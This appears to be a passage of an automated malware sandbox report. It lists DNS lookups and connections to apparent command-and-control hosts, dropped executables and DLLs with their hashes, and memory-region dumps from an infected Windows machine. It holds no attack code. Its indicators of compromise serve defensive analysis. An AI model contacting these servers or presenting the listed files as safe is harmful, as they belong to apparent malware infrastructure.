RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.239.127.146:80 api5.check-data.xyz tcp
US 8.8.8.8:53 146.127.239.44.in-addr.arpa udp
US 8.8.8.8:53 2835a0d1-f2ee-427a-b2fd-65f8e54e5645.uuid.statscreate.org udp
US 8.8.8.8:53 server15.statscreate.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.ipfire.org udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.96:443 server15.statscreate.org tcp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 44.27.3.81.in-addr.arpa udp

Files

memory/2916-0-0x0000000000B00000-0x0000000000FB7000-memory.dmp

memory/2916-1-0x00000000777A4000-0x00000000777A5000-memory.dmp

memory/2916-3-0x0000000004B20000-0x0000000004B21000-memory.dmp

memory/2916-2-0x0000000000B00000-0x0000000000FB7000-memory.dmp

memory/2916-9-0x0000000004B40000-0x0000000004B41000-memory.dmp

memory/2916-8-0x0000000004B00000-0x0000000004B01000-memory.dmp

memory/2916-7-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

memory/2916-6-0x0000000004B50000-0x0000000004B51000-memory.dmp

memory/2916-5-0x0000000004B10000-0x0000000004B11000-memory.dmp

memory/2916-4-0x0000000004B30000-0x0000000004B31000-memory.dmp

memory/2916-11-0x0000000004B70000-0x0000000004B71000-memory.dmp

memory/2916-12-0x0000000004B60000-0x0000000004B61000-memory.dmp

memory/2916-16-0x0000000000B00000-0x0000000000FB7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

MD5 7b51614032cf0e89432f5ff123c65044
SHA1 c9aeeee7d2db471eac0bf71cfa948d491a2bb4b6
SHA256 f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287
SHA512 20603dc18c014996fdf5773f473471527c8454c64c67344264ffa1798ed151d4bb09375fc151b2cfa4503607b707db18d9f0ba96775872fc3e94be58963b55f2

memory/1680-19-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/1680-24-0x00000000057F0000-0x00000000057F1000-memory.dmp

memory/1680-23-0x0000000005850000-0x0000000005851000-memory.dmp

memory/1680-22-0x0000000005820000-0x0000000005821000-memory.dmp

memory/1680-26-0x0000000005800000-0x0000000005801000-memory.dmp

memory/1680-25-0x0000000005810000-0x0000000005811000-memory.dmp

memory/1680-21-0x0000000005830000-0x0000000005831000-memory.dmp

memory/1680-20-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/1680-27-0x0000000005880000-0x0000000005881000-memory.dmp

memory/1680-28-0x0000000005870000-0x0000000005871000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

MD5 1c7d0f34bb1d85b5d2c01367cc8f62ef
SHA1 33aedadb5361f1646cffd68791d72ba5f1424114
SHA256 e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c
SHA512 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

memory/200-42-0x0000000000CD0000-0x0000000000D22000-memory.dmp

memory/200-43-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/2296-46-0x0000000000400000-0x000000000044C000-memory.dmp

memory/2296-49-0x0000000000400000-0x000000000044C000-memory.dmp

memory/200-50-0x0000000003020000-0x0000000005020000-memory.dmp

memory/2296-52-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-51-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-53-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-54-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-55-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-56-0x0000000000400000-0x000000000044C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

MD5 31841361be1f3dc6c2ce7756b490bf0f
SHA1 ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA512 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

memory/956-70-0x0000000000400000-0x0000000000592000-memory.dmp

memory/1680-71-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/2336-72-0x0000000000020000-0x00000000002D8000-memory.dmp

memory/956-75-0x00000000729F0000-0x00000000730DE000-memory.dmp

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

MD5 20ae0bb07ba77cb3748aa63b6eb51afb
SHA1 87c468dc8f3d90a63833d36e4c900fa88d505c6d
SHA256 daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d
SHA512 db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

MD5 0c582da789c91878ab2f1b12d7461496
SHA1 238bd2408f484dd13113889792d6e46d6b41c5ba
SHA256 a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
SHA512 a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

memory/1396-83-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/1396-84-0x0000000000100000-0x0000000000152000-memory.dmp

memory/1396-85-0x0000000004EC0000-0x00000000053BE000-memory.dmp

memory/1396-86-0x0000000004A60000-0x0000000004AF2000-memory.dmp

memory/1680-88-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/1396-89-0x0000000004A50000-0x0000000004A60000-memory.dmp

memory/1396-87-0x00000000049D0000-0x00000000049DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp8865.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/2892-105-0x00000000004F0000-0x00000000005B0000-memory.dmp

memory/1396-108-0x0000000005540000-0x00000000055B6000-memory.dmp

memory/2892-109-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/200-110-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/1396-111-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

memory/200-112-0x0000000003020000-0x0000000005020000-memory.dmp

memory/2892-113-0x000000001B1D0000-0x000000001B1E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

MD5 b22521fb370921bb5d69bf8deecce59e
SHA1 3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea
SHA256 b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158
SHA512 1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c

memory/1396-124-0x0000000006540000-0x0000000006B46000-memory.dmp

memory/1396-125-0x00000000060B0000-0x00000000061BA000-memory.dmp

memory/1396-127-0x0000000006040000-0x000000000607E000-memory.dmp

memory/1932-133-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1396-132-0x00000000061C0000-0x000000000620B000-memory.dmp

memory/1924-134-0x0000000000E20000-0x0000000000E94000-memory.dmp

memory/1932-136-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1932-137-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1396-126-0x0000000005FE0000-0x0000000005FF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe

MD5 8026082d59bac905bcc4098c69b98743
SHA1 5c8bffce653aa3b6c3e14d5f02927648b5ca8768
SHA256 f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005
SHA512 304339d26694f1225a23014862676f759c9332ea43ab53c9cb665346228dbed5ece4dca5e41b4d577fdf18ea70f7c61cda852e5122a7fbcf3bdfec5acc0f9f42

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

MD5 8510bcf5bc264c70180abe78298e4d5b
SHA1 2c3a2a85d129b0d750ed146d1d4e4d6274623e28
SHA256 096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6
SHA512 5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll

MD5 f35b671fda2603ec30ace10946f11a90
SHA1 059ad6b06559d4db581b1879e709f32f80850872
SHA256 83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7
SHA512 b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705

memory/4872-189-0x0000020F73AB0000-0x0000020F73AC0000-memory.dmp

memory/4872-187-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/3228-194-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/3228-193-0x0000000000950000-0x00000000009A2000-memory.dmp

memory/956-192-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/3228-195-0x0000000005200000-0x0000000005210000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-873560699-1074803302-2326074425-1000\76b53b3ec448f7ccdda2063b15d2bfc3_9251837d-e9a5-4229-9a78-b1085d98b1bb

MD5 c117b2495e0bf84ef6be7c4efd6974b8
SHA1 c26648871010d12fd8159e6cba9da8a129ccba22
SHA256 321e013dd27479144dbc9adf9c76cdcce19dc34b76fe5a83448a98229bcff95a
SHA512 5ffb45f7d1891acdbbe4a51faa12b746758d21888ca3812d16a81f97770119207fc6fabff4913dbd4d80a70999ecf5afef11e1307dbdc1850fa2f272b9f1ca38

memory/4872-182-0x0000020F594A0000-0x0000020F5950E000-memory.dmp

memory/4872-213-0x0000020F5B100000-0x0000020F5B15E000-memory.dmp

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 bc66475ee3b9ba37ec6828944dadd734
SHA1 9b82600ed9625cd85c114473a66b2160aea60b0a
SHA256 4c14b7589cf62d4a93c2e2e3f6b74c3b2424973df96e12dfbfb988cc6d29d409
SHA512 e45e908918f2c08cc2a1fe85f268c858a6bfa082c792ce893ef649aeffe7d570b791236f70f6f9e1ac2388173a6e5b76fe53a340685d0f1880bb2f28a440cbdf

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

MD5 586f7fecacd49adab650fae36e2db994
SHA1 35d9fb512a8161ce867812633f0a43b042f9a5e6
SHA256 cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e
SHA512 a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

memory/292-229-0x0000000000170000-0x000000000019E000-memory.dmp

memory/1396-231-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/424-243-0x0000000000400000-0x000000000063B000-memory.dmp

memory/2984-236-0x0000000000400000-0x0000000000408000-memory.dmp

memory/424-250-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe

MD5 7fabf15848c951f6665ec449c8c77098
SHA1 f9ef6114a8e2d3838d0cadd4a71d6baf95e133cf
SHA256 a440e88b2c1d1746b82ffaadaef0571a14f3d76dbabba87b0c3de6ac5eff2f35
SHA512 4e8b84b13bf04befb12d2f1b2f36a1a7285be640315c1a8eb61137f77ca2202b62892d95fee02debaa75ca3b5d782a5d0a7a08a010206929187504a91e9ddb0a

memory/1680-289-0x0000000001120000-0x00000000015D7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vj2byeji.lk3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\Pictures\6p7Lc6wCyyx5sjdGwLrlnZ6Q.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\4bfKBpwrjclcPetR6QZGvVSR.exe

MD5 5639162c3324d30242a477f678cdf7ae
SHA1 6383b421604381f6418a65219e47629d110d5a9a
SHA256 5166f78d79dd4747fd9b2215b272427b8cf4cd80fa4fee5f1a291a81fb5f50cd
SHA512 02528ebb3e42f38b65152fb341e01dfe0d9aa6c381bdb742432335d8850af1fd7813d1369d05b03d884d61910fa5d1140ee6553bc25a0d5e043ef1c6d3aabd61

C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe

MD5 b6c03763d95cfc6ddfabcac9c0b36dc2
SHA1 122d715c03c197df8e4ede8b94f4cd2c9dba6c57
SHA256 77809f86a370b278605306dd2bc04c713e0061d7092c8b7e5a2c6334b49314a2
SHA512 e1dbfb5ed5d3d9c147433577893fde4db790cdd966dfae2a19c93ab4e97dc23662089fb0682e50ff4c7950ac75a955e9bc15ebc145e9f426b5f2e43c2d6a7199

memory/4044-335-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe

MD5 6184676075afacb9103ae8cbf542c1ed
SHA1 bc757642ad2fcfd6d1da79c0754323cdc823a937
SHA256 a0b0b39b69005a2d39a8b8271a3518aa0a55148b794d2b4995b3c87ed183b23b
SHA512 861ac361b585a069f2274b577b30f2a13baf72a60acd4f22da41885aee92c3975445150822f1072590d7b574ff54eb3abde6a6c4f800988ab9ff4344884f41fa

memory/424-400-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

MD5 154c3f1334dd435f562672f2664fea6b
SHA1 51dd25e2ba98b8546de163b8f26e2972a90c2c79
SHA256 5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f
SHA512 1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841

C:\Users\Admin\AppData\Local\ybNrgxULfUnAMWHEEnovJtXp.exe

MD5 f8010cfbb1ea6f0c8525eaba77721cf7
SHA1 cf5e7b72af904301fa13f7ec8a8be324dde5c3ea
SHA256 5f07907b56589f833d0916aa6b4428977082a844878e620f49053dc868670f52
SHA512 f295deaf43a8a6f1ec8fc2172da6c569914e8e91f814ff575be2856b227a7ad3be889913113d8c0f690dcf7b321ba74adc74eac00b05e1abeb3a288b6ab5dcec

C:\Users\Admin\AppData\Local\Temp\tmpD0D9.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

memory/1680-513-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/4960-516-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe

MD5 986c6384b1282fbf0053f17ed64e8d6b
SHA1 c92f082073a5d85f433c985b9d7cd62e4b03b239
SHA256 bb175eb1e0a3560fa5bd83ffa7291420e4be8382a2c36c9687018d77fe86721e
SHA512 b46706cf42ade93c0ddc1925a2a1acca39da1183462b5121c01888e40c5bcc05e698b6929985e308495ed6f528fe01b51cf9204f51d38ad3e58ad8f859ab69f2

C:\Program Files (x86)\GameServerClient\installg.bat

MD5 b6b57c523f3733580d973f0f79d5c609
SHA1 2cc30cfd66817274c84f71d46f60d9e578b7bf95
SHA256 d8d718641bdf39cca1a5db7bb52d3c66d400a97bef3cafdd81cd7e711a51c570
SHA512 d39440163592bc3b1cb7830f236a97d5819c10775e453637d5a04a981e9a336480c6b4701afdceba0d52dfe09413b7abe2ad58ff55b5057a26229f3ccdc3a7c7

memory/1360-543-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u3ts.1.zip

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

memory/4980-556-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 039e44f4c3f36bbd059c2dee6ad0b06d
SHA1 4749f71f21eb9069cfacc3f2be88184c08ae19f8
SHA256 1daf147d884f525ad7c501c492637ccd2202881d992893e762cc825e50f53576
SHA512 1146f08174af0d3f854fac7d434cce0a6f639cb0057d9f5ed3bb897822198a87c5cdf2c361d9f2cff87bc0cd40bbad15ce271631608bdb548eea2bf1a3de0e08

C:\Program Files (x86)\GameServerClient\GameService.exe

MD5 d9ec6f3a3b2ac7cd5eef07bd86e3efbc
SHA1 e1908caab6f938404af85a7df0f80f877a4d9ee6
SHA256 472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c
SHA512 1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

memory/5636-707-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 7ce47df53c8f0ba7ccf885c309afc484
SHA1 b25ad9723b06d3861498caa32ffb1b7b38701a95
SHA256 7031b6b7bc43cf4ee90d4ec4860b78a442352243ea28f5d959b56222b13de2e4
SHA512 78585fbfcfe2e7a27f0ee168075958923184e67da1668850d0e66e31f0fd0a5516c04a17693ad197da7ffffb179265cd54fe0629fa30e00a6f269c6d68277efd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5d2bce770d65e0ae6792874dcc48233
SHA1 853be0952dc8a6ba3c0256f86392b96196483c32
SHA256 e84d4bfc979ea85f4b431584089da16709a836bae727dc3f1ee97e5092a2836f
SHA512 11abdf2bb84b0d8fc43c81e7f7af5400889c3d3d180f9533113f375893e014c1dd7ffae655f677318211ed1d894635b56223cb712c460d6e6a55c045ba401998

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

MD5 bf4360d76b38ed71a8ec2391f1985a5f
SHA1 57d28dc8fd4ac052d0ae32ca22143e7b57733003
SHA256 4ebec636d15203378e15cc11967d00cbd17e040db1fca85cf3c10bbf7451adaf
SHA512 7b46bc87dc384d8227adf5b538861165fa9efa18e28f2de5c1a1bb1a3a9f6bef29b449706c4d8e637ae9805bb51c8548cb761facf82d1c273d3e3699ae727acd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1713c1068fbcd242e0e2a7409a1dc4f1
SHA1 1421c2e7c40559e382f9c8e7cd449a693e2ee4c4
SHA256 3562ad72f78b76bcb26547ff3a74dea0c86e9d3e97efbeaba663c5300e3d2769
SHA512 0b18ced85a8657e03b123b682333cf81358d2b9edc10c390c9d4e500d9e0c91995bc65cdf7cf45a74a9531f6724cabe9f3751fd4782f0eeefefb4ba84d3c04c1

C:\Users\Admin\AppData\Local\Temp\u3ts.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

memory/1680-758-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/4960-759-0x0000000000400000-0x0000000002C46000-memory.dmp

memory/6132-760-0x0000000000400000-0x0000000003005000-memory.dmp

memory/5268-761-0x0000000000400000-0x0000000003005000-memory.dmp

memory/1360-764-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

MD5 f75a721168b26ed37766cea55ab2601c
SHA1 c878bc98c0571bae149c5a716811ea0f082f793a
SHA256 a438d6fb093ab1057905c745d8be9199ce8ff5b8c7a74ba274cf0f2a491a4ef4
SHA512 166abccddc272c1d487195e340ff0ea9e4e51376e04308195f198aaf6744437818606cd3ef3f217ecf89a474d677b01bd5fc6bbf491883f912318d6c37b16455

\Users\Admin\AppData\Local\Temp\Opera_installer_2404252230432084312.dll

MD5 45fe60d943ad11601067bc2840cc01be
SHA1 911d70a6aad7c10b52789c0312c5528556a2d609
SHA256 0715f9558363b04526499fcd6abf0b1946950af0a7f046a25f06b20dddb67add
SHA512 30c82f6b329fefa5f09a5974c36b70ea2bdab273e7d6eadd456fddcc2aa693f8f1cf096d57c3719d1106e9f85d50a4ffbf0ed7e66da2da0a5f23b6ee8c7194ba

memory/3900-783-0x000000006A250000-0x000000006A3CB000-memory.dmp

memory/3900-784-0x00007FF94DFB0000-0x00007FF94E18B000-memory.dmp

memory/4980-792-0x0000000000400000-0x0000000003005000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/5636-845-0x0000000000400000-0x0000000002C46000-memory.dmp

memory/3900-866-0x000000006A250000-0x000000006A3CB000-memory.dmp

memory/1680-880-0x0000000001120000-0x00000000015D7000-memory.dmp

C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe

MD5 df6f31e8f5932ede1ac816775d68a7db
SHA1 a734ee93779fafc90beeb511a99e90b8d3335bbd
SHA256 1de6cb566557a3e8703ec676a8e626e192f095f35640575bdabb5d2edb179c40
SHA512 caee1a09e4091f2b649cc831773e2e13600d75ff47ef252e126c099bad4a29feac7c76d6f7f718e4c6be344dc0e2fcd00498514a6beca20f4a977a1e597ffbf4

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/6132-895-0x0000000000400000-0x0000000003005000-memory.dmp

memory/5268-907-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

memory/1360-908-0x0000000000400000-0x0000000003005000-memory.dmp

memory/4632-917-0x00007FF94DFB0000-0x00007FF94E18B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u4ck.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/4980-933-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u4ck.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\u4ck.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

memory/4960-993-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u4ck.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/6592-1006-0x000000006A250000-0x000000006A3CB000-memory.dmp

memory/6592-1011-0x00007FF94DFB0000-0x00007FF94E18B000-memory.dmp

C:\Users\Admin\Pictures\xwQ4rB9tg3am9UsDtsfZJtfz.exe

MD5 d981fb3fc1f28bea729db051c75dae08
SHA1 d5eea12045a6d998da1a362f70748fc09874d0b4
SHA256 aa5689332012817778e4ef3602e918297c567c4d573b463f86e8d98fef2eb48f
SHA512 a93576bc04ac5b1ba129913c3d4e5100cf7f0f8bd7a4c9a21ce3af645624890006e087eefa5d0cbd804b7b96ebc13cf32a722b8c1d66d409879f41d5bfa974cb

memory/5636-1012-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u4ck.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/5636-1043-0x0000000000400000-0x0000000002C46000-memory.dmp

memory/1680-1066-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/6036-1076-0x0000000000400000-0x0000000000846000-memory.dmp

memory/7028-1075-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\Install.exe

MD5 e77964e011d8880eae95422769249ca4
SHA1 8e15d7c4b7812a1da6c91738c7178adf0ff3200f
SHA256 f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50
